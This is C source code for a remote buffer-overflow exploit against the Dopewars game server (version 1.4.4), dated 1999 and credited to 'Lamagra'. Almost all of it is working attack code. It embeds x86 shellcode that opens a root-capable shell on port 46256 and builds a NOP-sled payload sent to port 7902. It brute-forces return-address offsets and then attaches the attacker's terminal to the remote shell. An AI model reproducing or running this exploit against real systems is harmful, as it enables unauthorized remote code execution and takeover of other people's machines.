/* PRIVATE Do NOT Distribute PRIVATE */ #include #include #include #include #include /* * Dopewars by Ben Webb (Version 1.4.4 maybe older ones too). * This exploit will cause a shell to be created on port 46256. * The bug in located inside the ProcessMessage() and ExtractWordDelim() * functions. * * I already send a patch to the Ben Webb and he'll add it in the next release. * * Date: oktober 1999 * Lamagra */ char hellshell[]= "\x55\x89\xe5\xb2\x66\x89\xd0\x31\xc9" "\x89\xcb\x43\x89\x5d\xf8\x43\x89\x5d\xf4\x4b\x89" "\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89\x45\xf4" "\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\xb4\xb0\x89" "\x4d\xf0\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10" "\x89\xd0\x8d\x4d\xf4\xcd\x80\x89\xd0\x43\x43\xcd" "\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9\xb2\x3f" "\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41" "\xcd\x80\xc7\x45\xe8\x2f\x62\x69\x6e\x66\xc7\x45" "\xec\x2f\x73\xc6\x45\xee\x68\x31\xc9\x88\x4d\xef" "\xb0\x0b\x8d\x5d\xe8\x89\x5d\xe0\x8d\x4d\xe0\x31" "\xd2\x89\x55\xe4\xcd\x80"; char jmpcode[]="\xeb\x0d"; int shell(unsigned long); void transfer(char *, int); void do_expl(int,int,long); unsigned long resolve(char *); main(int argc, char **argv) { int time,offset=0,client,fd; struct sockaddr_in addr, clientaddr; long eip = 0xbffff620; if(argc < 2) { printf("Usage: %s {[-b] [offset]} {[hostname] [offset]}\n",argv[0]); exit(-1); } if(argc > 2) { if(!strncmp(argv[2],"0x",2)) eip = strtoul(argv[2],0,0); else offset = atoi(argv[2]); } fd = socket(AF_INET,SOCK_STREAM,0); addr.sin_family = AF_INET; addr.sin_port = htons(7902); if(strcmp(argv[1],"-b")) { addr.sin_addr.s_addr = resolve(argv[1]); for(time = 0;time < 20;time++) { /* Connect to server */ while(connect(fd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1) { perror("can't connect to server"); memset(addr.sin_zero,NULL,sizeof(addr.sin_zero)); sleep(20); } do_expl(fd,offset,eip); sleep(1); shell(addr.sin_addr.s_addr); offset += 100; /* increase offset and try again */ } } else{ /* bind to 7902 and wait for a client */ addr.sin_addr.s_addr = INADDR_ANY; if(bind(fd,(struct sockaddr *)&addr,16) == -1) { perror("bind"); exit(-1); } listen(fd,5); bzero((char*)&clientaddr,sizeof(struct sockaddr_in)); client = accept(fd,&clientaddr,16); do_expl(client,offset,eip); sleep(1); shell(clientaddr.sin_addr.s_addr); } close(fd); } void do_expl(int fd,int offset, long addy) { char buf[1024],*sploit; char nops[213]; int x; long *addr_ptr; /* check eip for 0x0 */ if(!(addy+offset & 0xff) || !(addy+offset & 0xff00) || !(addy+offset & 0xff0000) || !(addy+offset & 0xff000000)) { printf("NULL detected in address\n"); offset += 1; } sploit = nops; for(x = 0;x < 200 - strlen(jmpcode);x++) *(sploit++) = 0x90; for(x = 0;x < strlen(jmpcode);x++) *(sploit++) = jmpcode[x]; printf("Using address: 0x%x\n",addy+offset); addr_ptr = (long *)(sploit++); for(x = 0; x < 12;x+=4) *(addr_ptr++) = addy + offset; sprintf(buf,"%s^%s^%s\n",nops,nops, hellshell); write(fd,buf,strlen(buf)); } int shell(unsigned long addy) { char buf[1024]; fd_set set; int len,sockfd; struct sockaddr_in addr; addr.sin_family = AF_INET; addr.sin_port = htons(46256); addr.sin_addr.s_addr = addy; sockfd = socket(AF_INET,SOCK_STREAM,0); if(connect(sockfd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1) { perror("Sploit failed, connect"); close(sockfd); return -1; } strcpy(buf,"cd /;id;echo \"hehe success, don't do anything nasty\"\n"); write(sockfd,buf,strlen(buf)); while(1) { FD_SET(fileno(stdin),&set); FD_SET(sockfd,&set); select(sockfd+1,&set,NULL,NULL,NULL); if(FD_ISSET(fileno(stdin),&set)) { memset(buf,NULL,1024); fgets(buf,1024,stdin); write(sockfd,buf,strlen(buf)); } if(FD_ISSET(sockfd,&set)) { memset(buf,NULL,1024); if((len = read(sockfd,buf,1024)) == 0) { printf("EOF.\n"); close(sockfd); exit(-1); } if(len == -1) { perror("read"); exit(-1); } puts(buf); } } } unsigned long resolve(char *name) { struct hostent *hp; unsigned long ip; if((ip = inet_addr(name)) == -1) { if((hp = gethostbyname(name)) == NULL) { printf("Unable to resolve <%s>\n",name); exit(-1); } memcpy(&ip,hp->h_addr,4); } return ip; }